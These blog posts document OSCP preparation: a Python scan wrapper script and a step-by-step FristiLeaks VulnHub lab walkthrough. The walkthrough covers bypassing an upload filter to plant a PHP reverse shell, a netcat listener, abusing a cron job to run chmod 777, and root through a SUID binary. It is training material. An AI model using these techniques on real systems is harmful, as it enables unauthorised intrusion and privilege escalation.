OSCP-bits #1: scan, a python wrapper script

Hi there,

I just started getting back into the OSCP course again. When I left off around May 2018, I had about 12 machines rooted and now I am back with a desire to get them all.

That's why I am starting a miniseries called OSCP-bits, which will include small pieces of scripts, knowledge or other things I learned during my OSCP studies.

So, it occurred to me that I start off scanning every machine with the same set of options, using onetwopunch.sh by superkojiman:

  • https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh

Also I recently started to always open Wireshark before scanning so I can follow what exactly is happening there. So I spent about 3 minutes setting it all up before I would scan away, time that I could use better on enumeration or other stuff, especially if you think about the OSCP exam.

So what better than to automate that process in one short command? Say:

    scan

And I did find a solution for it using python. But there are still a few rough edges to it that are a bit on the quick & dirty side of things. Passing options from a python script to a shell script that in turn passes them to a command line program turns out to be somewhat of a pain in the butt.

For you to make this script work, download the onetwopunch.sh script to ~/scripts, then make a copy of it:

    $ cp onetwopunch.sh onetwopunch_standard.sh

Then you need to modify line 56 of it to suit your needs. The default of onetwopunch.sh is:

    -sV

I changed it to the following, as I don't mind going all in on vulnerable VMs:

    -vv -Pn -sV -sC

Of course this is not a perfect solution, but for the moment it works just fine.

So then just add the script below to your /root/scripts directory on the Kali machine and make a symlink to it in your path, /usr/bin:

    $ ln -s /root/scripts/scan /usr/bin/scan

After opening a new shell you can type scan from everywhere and it will open up Wireshark with the capture filter host <target> on the interface tap0, which is usually the one you will be connecting to the OSCP VPN with. It also has the switches -S, -l and -k set: -S to automatically update the packet display, -l to enable automatic scrolling (does not work in the version provided on the OSCP VM, I did not update it) and -k to start capturing immediately.

[image: The script in action]

So here is the code of /root/scripts/scan, just make sure to make it executable before running it with:

    $ chmod +x scan

Also I recommend using a terminal that is somewhat translucent, Terminator is my favourite, as it is so versatile. Just set the opacity to about 80% and you can still see what's happening in the background without being distracted too much by it.

```python
#!/usr/bin/env python
import os
import subprocess
import sys
import time

if len(sys.argv) != 2:
    sys.exit("usage: scan <target-ip-or-hostname>")

target = sys.argv[1]

# Create a temporary text file containing the target's hostname/IP;
# onetwopunch.sh reads its targets from a file (-t), one per line.
with open("/tmp/target.txt", "w") as f:
    f.write(target + "\n")

print("\n\nScanning " + target + " ...\n\n")

# Open Wireshark in its own window with a capture filter that matches the
# sending and the receiving host: -i tap0 (the OSCP VPN interface), -k start
# capturing immediately, -l auto-scroll, -S update the packet display live.
capture_filter = "host " + target
wireshark = subprocess.Popen(
    ["/usr/bin/wireshark", "-f", capture_filter, "-i", "tap0", "-k", "-l", "-S"])

# Wrapper for onetwopunch.sh: give Wireshark a few seconds to come up, then
# run the modified copy against the target file on the same interface.
time.sleep(7)
subprocess.check_call(
    ["/root/scripts/onetwopunch_standard.sh", "-t", "/tmp/target.txt", "-p", "all", "-i", "tap0"])

os.remove("/tmp/target.txt")
```

I have a couple of things on my mind about what else to do with that script or how to improve it, but for now it's ripe for you to try it out and give some feedback, or just work with it as is.
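As an added example (not the post's own script), here is how the two commands the wrapper runs can be built from a validated target and a private temp file: a target string containing spaces or operators can no longer rewrite the "host" capture filter, and the target list no longer goes to the predictable /tmp/target.txt. It assumes the post's paths (/root/scripts/onetwopunch_standard.sh, /usr/bin/wireshark) and the tap0 interface.

```python
#!/usr/bin/env python3
# Added example, not the post's scan script: builds the two commands the post
# runs, but validates the target before it reaches the capture filter or the
# scanner and writes the target list to a private temp file instead of the
# fixed /tmp/target.txt. Paths and tap0 are taken from the post's setup.
import ipaddress
import re
import tempfile

ONETWOPUNCH = "/root/scripts/onetwopunch_standard.sh"
WIRESHARK = "/usr/bin/wireshark"
# Hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def is_valid_target(target):
    """True for an IP address or plain hostname; False for anything with
    spaces, operators or quotes that could rewrite the 'host' filter."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(target))


def wireshark_argv(target, iface="tap0"):
    """Wireshark as the post starts it: filter 'host <target>' on tap0,
    -k capture now, -l auto-scroll, -S update the packet list live."""
    if not is_valid_target(target):
        raise ValueError("refusing target %r" % target)
    return [WIRESHARK, "-f", "host " + target, "-i", iface, "-k", "-l", "-S"]


def write_target_file(target):
    """Write the target to a fresh mode-0600 temp file (mkstemp semantics)
    that no other local user can pre-create or swap; returns its path."""
    if not is_valid_target(target):
        raise ValueError("refusing target %r" % target)
    with tempfile.NamedTemporaryFile("w", prefix="scan-", delete=False) as fh:
        fh.write(target + "\n")
        return fh.name


def onetwopunch_argv(target_file, iface="tap0", ports="all"):
    """onetwopunch_standard.sh -t <file> -p all -i tap0, as in the post."""
    return [ONETWOPUNCH, "-t", target_file, "-p", ports, "-i", iface]
```

Wire the pieces together the same way the original does: subprocess.Popen(wireshark_argv(target)), sleep a few seconds, subprocess.check_call(onetwopunch_argv(write_target_file(target))), and remove the temp file afterwards.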

Cheers,
walksthewires


Fristileaks 1.3

The machine can be downloaded here:

https://www.vulnhub.com/entry/fristileaks-13,133/

Thanks to the guy who built it: Ar0xA

It's a beginner level vulnerable machine which was part of some Dutch hacking con, and is meant to be solved in under 4 hours.

Without further ado, let's delve into it:

Step 1: Let's use netdiscover with the following command to find the host

    netdiscover -i eth0 -r 192.168.178.0/24

Unfortunately this did not work out, as can be seen here:

[image: Fristi_01]

Step 2: Let's use nmap to scan the machine

While booting up the virtual machine, the machine's IP address is visible, which is why I do not consider finding the IP part of the game:

    nmap -A -vv -T5 -oN fristileaks 192.168.178.53

```text
# Nmap 7.60 scan initiated Tue Jan 9 21:37:17 2018 as: nmap -A -vv -T5 -oN fristileaks 192.168.178.53
Nmap scan report for 192.168.178.53
Host is up, received arp-response (0.00042s latency).
Scanned at 2018-01-09 21:37:17 GMT for 12s
Not shown: 999 filtered ports
Reason: 990 no-responses and 9 host-prohibited
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
TCP/IP fingerprint:
Uptime guess: 0.011 days (since Tue Jan 9 21:21:55 2018)
```

So what does this tell us?

  • There is only port 80 open on the machine.
  • There's an Apache 2.2.15 running on CentOS, bundled together with DAV/2 and PHP/5.3.3.
  • The robots.txt reads like this:

```text
User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer
```

Those might be interesting links to follow. Let's see…

Step 3: Visit the webpage, check disallowed pages and source code for hints

[image: Fristi_03]

Ok, so Fristi is some sort of mixed milk drink from the Netherlands. Honestly I should have looked this up first, otherwise I wouldn't have been stuck so long on this hint. In my defense, it's usually quite late when I get to work on my vulnerable machines, and after a long day's work and some time in the gym I might lack some basic creativity.

So all the links mentioned in the robots.txt (named after drinks, obviously beer and cola; sisi is some Dutch speciality, too) lead to a page that only consists of the following picture:

[image: Screenshot from 2018-01-11 22-42-31]

Yeah, the source code on all three pages reveals nothing, too. I think I will just not mention the hour I spent using dirb trying to find other directories of interest.

Also I won't mention the time I spent using strings, exif and foremost looking to pull any more info from the pictures the webpage gave me.

Even the /colasisibeer directory did not exist.

So if you do not find the obvious you need to look for the obscure. At least that's what I thought at that moment.

So of course the next step was:

Step 4: Looking for exploits with searchsploit

As described above I was quite desperate at that moment, so I found myself two exploits which might fit the bill:

    searchsploit Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

```text
apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak      | exploits/linux/webapps/42745.py
```

After spending another 20 minutes trying to understand what they do, I figured this is a beginner VM after all and this is surely not the intended path to take. Also, since I did not want to spend more time on this, I did not run the exploits without understanding what they do. I think that's a good rule to hold on to.

Step 5: Help me internet, dammit

So, after all this exploring in the wrong direction I consulted the unending wisdom of the internetz for some help on my lack of creativity here.

The answer was so simple… I swear I will do my basic research up front from now on:

    http://192.168.178.53/fristi/

So this is where the admin portal login hid. The picture says it all:

[image: haha]

Step 6: Back on track, checking the page source for hints

So after quickly checking for SQL injection errors (kinda pointless), I did check the source code, which indeed does look more promising:

1) There is this comment, which contains a possible username, eezeepz:

    <!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz -->

2) Also the source code contains two base64 encoded parts. The second part is commented out.

The note above refers to it as junk, so let's decode it (encode2 being a file holding that second, commented-out part):

    cat encode2 | base64 --decode > out.png

The out.png looks like this:

[image: kek]

So we got a possible username and this weird string keKkeKKeKKeKkEkkEk saved in a picture. Might as well be the credentials we need. After all this needs to be done in less than four hours.

Step 7: The login does work, we got an upload page

[image: upload]

So with the login successful, we are able to upload pics now, possibly also a shell in php, too. So I quickly prepared pentestmonkey's php shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) and created a netcat listener on my machine:

    netcat -vvl -p 8000

So I cannot upload php files directly, the file needs to be a .png, a .jpg or a .gif file. So I change the shell's name to shell.php.png and here we go:

[image: boom]

Step 8: We got shell now! Let's explore.

By opening http://192.168.178.53/fristi/uploads/shell.php we will get a reverse shell on our listener:

[image: Fristi_06]

By default I always try this to upgrade the shell to a tty shell, so it's easier to use:

```shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
cd /tmp
python asdf.py
```

After navigating the filesystem a bit I find a note in /var/www/cgi-bin:

```text
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
```

Following up on this, I found another notes file in /home/eezeepz:

```text
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
```

Intrigued. So, chmod is available with the admin user's privileges? Let's make the /home/admin folder accessible to everyone.

```shell
cd /tmp
echo "/home/admin/chmod -R 777 /home/admin/" > runthis
```

Step 9: Let's browse the admin directory.

[image: admindir]

    cat whoisyourgodnow.txt

    =RFn0AKnlMHMPIzpyuTI0ITG

Interesting… let's see.

    cat cryptedpass.txt

    mVGZ3O3omkJLmy2pcuTq

Ok, so what's cryptpass.py?

    cat cryptpass.py

```python
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
```

So, let's build a little python script that does the above script's encoding in reverse: it base64-encodes, reverses the string and applies rot13, so we undo it by reversing, applying rot13 and base64-decoding. Easy, let's build the script and decode the whoisyourgodnow.txt on my machine:

```python
import base64, codecs, sys

def decodeString(s):
    # Undo the three steps of cryptpass.py in reverse order:
    # un-reverse the string, undo rot13, then base64-decode.
    reverse = s[::-1]
    rot13string = codecs.decode(reverse, 'rot13')
    return base64.b64decode(rot13string)

cryptoResult = decodeString(sys.argv[1])
print(cryptoResult.decode())
```

Great success, the password looks to be LetThereBeFristi!

Let's try it!

Step 10: Let's log in as fristigod.

Let's do this. Why fristigod? Because, besides the eezeepz and the admin dir, there is a fristigod dir in the /home directory.

    su - fristigod

Once I was fristigod I found this:

    cd /var/fristigod/.secret_admin_stuff

There is a SUID executable called doCom with the following permissions:

    -rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom

I checked the file with strings:

```text
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setuid
exit
strcat
stderr
system
getuid
fwrite
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
Nice try, but wrong user ;)
Usage: ./program_name terminal_command ...
```

I tried to execute this, but it did not let me:

```text
sudo ./doCom
[sudo] password for fristigod: LetThereBeFristi!
Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.
```

Step 11: Following the lead in the .bash_history file

In the home directory of fristigod I found a bash history file:

    cat .bash_history

This looks promising:

    sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

Let's just try this then:

```text
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# whoami
whoami
root
```

Boom, root! Let's wrap this up:

```text
cd /root
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1
```

Done!

Despite the initial lack of research into what Fristi is, I think I managed to pull this off in about 4 hours. Still, there is a feeling that I cheated on this. Hopefully the next Vulnhub VM will be all my work.

Again, thanks to the author of Fristileaks and also a shout out to the Vulnhub.com page, which does a great job hosting all those machines.

Cheers.

Rebooting the blog in preparation for the OSCP Certification

Hello again. After a long absence from blogging, I decided to reboot the blog for the preparation phase of my OSCP course, which is scheduled to start on the 21st of January 2018.

I decided to go along the path abatchy suggested in his blog post (http://www.abatchy.com/2017/02/oscp-like-vulnhub-vms), and try to solve as many of the vulnerable machines I can get my hands on before the course itself starts.

The list, which I shamelessly copied from his blog, reads like this:

Beginner friendly

Intermediate

Not so sure (Didn't solve them yet)

In general I try to solve those machines with my own skills and knowledge. But if I get stuck I will not hesitate to use any walkthroughs available to help me through, because this way I will learn things I did not know before.

And this might make the difference when taking the OSCP test.

Stay tuned for more to come soon.